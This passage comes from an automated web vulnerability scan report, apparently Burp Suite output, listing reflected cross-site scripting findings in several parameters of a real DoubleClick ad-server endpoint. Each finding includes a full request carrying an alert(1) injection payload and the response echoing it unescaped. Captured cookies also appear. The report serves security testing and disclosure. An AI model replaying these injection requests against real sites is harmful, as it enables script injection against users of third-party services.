Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:20 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
nV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340e57e6"-alert(1)-"48b41a44627&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%
...[SNIP]...

6.26. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d0ff'-alert(1)-'a90a5132410 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=20170023401d0ff'-alert(1)-'a90a5132410&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:25 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=20170023401d0ff'-alert(1)-'a90a5132410&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%
...[SNIP]...

6.27. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd50e"-alert(1)-"43a7c3abbc6 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3fd50e"-alert(1)-"43a7c3abbc6&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:40 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
;
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3fd50e"-alert(1)-"43a7c3abbc6&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/
...[SNIP]...

6.28. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec1d5'-alert(1)-'7f740edecfd was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3ec1d5'-alert(1)-'7f740edecfd&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:45 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
get=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3ec1d5'-alert(1)-'7f740edecfd&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/
...[SNIP]...

6.29. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a34ae'-alert(1)-'a50ba774864 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEENa34ae'-alert(1)-'a50ba774864&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:34 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEENa34ae'-alert(1)-'a50ba774864&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp:
...[SNIP]...

6.30. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62d24"-alert(1)-"6480d73bfc4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN62d24"-alert(1)-"6480d73bfc4&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:29 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN62d24"-alert(1)-"6480d73bfc4&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp:
...[SNIP]...

6.31. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e918"-alert(1)-"98486586506 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=109283854e918"-alert(1)-"98486586506&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:10 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
gif";
var minV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=109283854e918"-alert(1)-"98486586506&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1
...[SNIP]...

6.32. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efee8'-alert(1)-'f5fd40e0f0a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385efee8'-alert(1)-'f5fd40e0f0a&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:15 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385efee8'-alert(1)-'f5fd40e0f0a&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1
...[SNIP]...

6.33. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59df8'-alert(1)-'0d6f83edabc was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G59df8'-alert(1)-'0d6f83edabc&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:05 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G59df8'-alert(1)-'0d6f83edabc&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B4
...[SNIP]...

6.34. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cfc7"-alert(1)-"93944cc2a03 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G4cfc7"-alert(1)-"93944cc2a03&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:00 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
300x125_14Mar2011.gif";
var minV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G4cfc7"-alert(1)-"93944cc2a03&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B4
...[SNIP]...

6.35. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dc69"-alert(1)-"b1724e75ee9 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=3dc69"-alert(1)-"b1724e75ee9 HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 12:53:50 GMT
Expires: Mon, 02 May 2011 12:53:50 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=3dc69"-alert(1)-"b1724e75ee9http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/x3/2010/showr
...[SNIP]...

6.36. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e382b'-alert(1)-'c8d54a88246 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=e382b'-alert(1)-'c8d54a88246 HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 12:53:55 GMT
Expires: Mon, 02 May 2011 12:53:55 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=e382b'-alert(1)-'c8d54a88246http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/x3/2010/showr
...[SNIP]...

